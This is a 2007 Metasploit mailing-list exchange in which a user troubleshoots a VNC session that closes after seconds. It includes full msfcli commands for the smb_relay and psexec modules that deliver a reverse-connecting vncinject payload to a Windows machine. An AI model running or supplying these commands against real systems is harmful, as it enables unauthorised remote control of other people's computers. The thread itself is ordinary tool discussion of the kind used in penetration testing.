Metasploit mailing list archives

Re: smb_relay and vncinject

From: sigtrap at sigtrap.org (sigtrap)
Date: Mon, 10 Sep 2007 15:51:11 +0200

Wrong command. I was using the command below with another SMB relay
program... The VNC closes unexpectedly with the other SMB relay program
too (VNC was then started with msf psexec).
The command that I wanna use is:
./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7
PAYLOAD=windows/vncinject/reverse_tcp E

//Sigtrap

-----Original Message-----
From: "sigtrap" <sigtrap at sigtrap.org>
To: <framework at metasploit.com>
Date: Mon, 10 Sep 2007 15:45:10 +0200
Subject: smb_relay and vncinject

Hi,
On Gentoo I'm running msf v3.1-dev:
./msfcli windows/smb/psexec DisableCourtesyShell=1 LHOST=169.254.133.7
RHOST=127.0.0.1 PAYLOAD=windows/vncinject/reverse_tcp E

Everything works nice and the vncviewer (I have tried tightvnc and
"normal" vnc) pops up. But after 10-30 seconds the vncviewer closes and
msf tells me:
[*] VNC connection closed.

On the Victim (Windows XP Pro) the system event viewer reports Event ID
7009:
(Service Control Manager) Timeout (30000 ms) waiting for the [Random]
service to connect.

I dont know if the Windows error should be regarded becouse the
vncviewer
runs perfectly for a couple of seconds...

Any idees?

//Sigtrap

Current thread:

smb_relay and vncinject sigtrap (Sep 10)
- Re: smb_relay and vncinject sigtrap (Sep 10)
  - Re: smb_relay and vncinject Patrick Webster (Sep 10)
    - Re: smb_relay and vncinject H D Moore (Sep 10)
    - Re: smb_relay and vncinject Nicob (Sep 10)
    - No update in Metasploit exploit plugins Rawal, Rajesh (Sep 10)
    - No update in Metasploit exploit plugins mmiller at hick.org (Sep 10)
    - No update in Metasploit exploit plugins H D Moore (Sep 10)
    - No update in Metasploit exploit plugins Rawal, Rajesh (Sep 10)
    - No update in Metasploit exploit plugins M.P.Sairam (Sep 10)